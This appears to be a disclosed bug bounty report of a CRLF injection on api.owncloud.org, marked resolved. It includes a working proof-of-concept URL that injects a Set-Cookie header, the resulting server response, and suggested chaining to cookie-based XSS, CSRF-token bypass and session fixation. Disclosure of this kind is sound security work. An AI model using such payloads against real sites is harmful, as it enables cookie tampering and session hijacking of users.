[api.owncloud.org] CRLF Injection
O
ownCloud
Submitted None
Actions:
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**PoC**:
`https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;`
**HTTP Response**:
```
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 10:28:01 GMT\r\n
Server: Apache\r\n
Strict-Transport-Security: max-age=63072000\r\n
X-Xss-Protection: 1; mode=block\r\n
Location: https://doc.owncloud.org/api/#\r < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n
```
**Result**:
Creating a cookie-param "crlf=injection" on *.owncloud.org
This vulnerability could be used in combination with others. For example, XSS via Cookie, bypass Double Submit Cookie csrf protection or session fixation. HTTP headers delimiter \r (%0d) is supported by any web browser other than FireFox.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved